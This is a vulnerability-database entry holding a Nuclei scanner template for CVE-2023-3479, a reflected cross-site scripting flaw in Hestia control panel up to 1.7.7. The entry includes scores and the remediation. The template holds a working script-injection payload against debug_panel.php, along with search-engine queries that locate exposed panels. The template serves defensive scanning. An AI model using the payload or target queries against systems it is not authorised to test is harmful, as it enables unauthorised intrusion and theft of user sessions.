Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-3479
HistoryJul 09, 2023 - 9:02 a.m.

Hestiacp <= 1.7.7 - Cross-Site Scripting

2023-07-0909:02:02
ProjectDiscovery
github.com
11
cve2023
huntr
hestiacp
xss
intrusive
medium
reflected
github
repository

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

32.9%

Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.
id: CVE-2023-3479

info:
  name: Hestiacp <= 1.7.7 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of Hestiacp (1.7.8 or higher) to mitigate this vulnerability.
  reference:
    - https://huntr.dev/bounties/6ac5cf87-6350-4645-8930-8f2876427723/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3479
    - https://github.com/hestiacp/hestiacp/commit/2326aa525a7ba14513af783f29cb5e62a476e67a
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-3479
    cwe-id: CWE-79
    epss-score: 0.0007
    epss-percentile: 0.30234
    cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: hestiacp
    product: control_panel
    shodan-query:
      - http.favicon.hash:-476299640
      - http.title:"hestia control panel"
    fofa-query:
      - title="hestia control panel"
      - icon_hash=-476299640
    google-query: intitle:"hestia control panel"
  tags: cve2023,cve,huntr,hestiacp,xss,intrusive

http:
  - method: GET
    path:
      - '{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - debug-panel
          - <script>alert(document.domain)</script>
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502204f455524bdd08b261a7ac9ae06489916ec86682f339632160689c6ea834fb104022100fa4a8034622c08b9ae97a765b2cf660b9fc3ef6471f3f045ae0a2c5cbf5a67a4:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

32.9%

Related for NUCLEI:CVE-2023-3479